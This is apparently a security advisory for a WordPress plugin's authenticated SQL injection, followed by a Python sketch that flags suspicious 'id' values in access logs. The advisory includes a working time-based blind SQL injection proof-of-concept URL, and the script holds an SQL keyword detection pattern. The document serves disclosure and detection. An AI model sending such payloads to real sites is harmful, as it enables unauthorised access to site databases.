The plugin does not sanitise or escape multiple GET/POST parameters before using them in SQL statements in the admin dashboard, leading to authenticated SQL injections.
https://example.com/wp-admin/admin.php?page=pcx_add_sites&mode=add&id=1%20AND%20(SELECT%207953%20FROM%20(SELECT(SLEEP(5)))AgUn)
Shreya Pohekar of Codevigilant Project
Yes
2021-10-07 (about 10 months ago)
2021-10-07 (about 10 months ago)
2022-04-12 (about 4 months ago)
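
A detection sketch for requests shaped like the proof-of-concept above, added here as an example and not taken from the plugin or the advisory: it scans web access log lines for hits on the affected admin page where `id` is not a plain integer. It assumes a combined-format access log and that `id` is meant to be numeric (as in the PoC's `id=1`); the sample log lines are constructed, and parameters sent in POST bodies do not appear in access logs, so they are out of scope.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Path, page slug and parameter name come from the advisory's PoC URL.
TARGET_PATH = "/wp-admin/admin.php"
TARGET_PAGE = "pcx_add_sites"
NUMERIC_PARAMS = ("id",)

# Assumption: combined-format access log, request line in double quotes.
REQUEST_RE = re.compile(r'"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+"')
# SQL keywords and punctuation that never belong in a numeric record id.
SQL_TOKENS = re.compile(r"\b(select|sleep|benchmark|union|and|or)\b|[()'\";]|--", re.I)

# Constructed sample log lines (documentation IP ranges, invented timestamps).
SAMPLE_LOG = [
    '203.0.113.7 - - [07/Oct/2021:10:00:01 +0000] "GET /wp-admin/admin.php?page=pcx_add_sites&mode=add&id=1 HTTP/1.1" 200 5120',
    '203.0.113.7 - - [07/Oct/2021:10:00:09 +0000] "GET /wp-admin/admin.php?page=pcx_add_sites&mode=add&id=1%20AND%20(SELECT%207953%20FROM%20(SELECT(SLEEP(5)))AgUn) HTTP/1.1" 200 5120',
    '198.51.100.4 - - [07/Oct/2021:10:01:00 +0000] "GET /wp-admin/admin.php?page=other_page&id=abc HTTP/1.1" 200 900',
    '198.51.100.4 - - [07/Oct/2021:10:02:00 +0000] "GET /wp-admin/admin.php?page=pcx_add_sites&mode=add&id=12abc HTTP/1.1" 200 900',
]

def inspect_line(line):
    """Return a finding for a request to the affected page whose numeric
    parameter is not a plain integer; otherwise return None."""
    match = REQUEST_RE.search(line)
    if not match:
        return None
    url = urlsplit(match.group("target"))
    if url.path != TARGET_PATH:
        return None
    params = parse_qs(url.query)  # percent-decodes values, drops blank ones
    if TARGET_PAGE not in params.get("page", []):
        return None
    for name in NUMERIC_PARAMS:
        for value in params.get(name, []):
            if not re.fullmatch(r"[0-9]+", value):
                return {"param": name, "value": value,
                        "sql_tokens": bool(SQL_TOKENS.search(value))}
    return None

def scan(lines):
    """Return (line_number, finding) pairs for every suspicious line."""
    hits = []
    for number, line in enumerate(lines, start=1):
        finding = inspect_line(line)
        if finding:
            hits.append((number, finding))
    return hits

if __name__ == "__main__":
    for number, finding in scan(SAMPLE_LOG):
        print(number, finding)
```

A finding with `sql_tokens` set is the stronger signal; a non-numeric `id` without SQL tokens is still worth reviewing because the page expects an integer there.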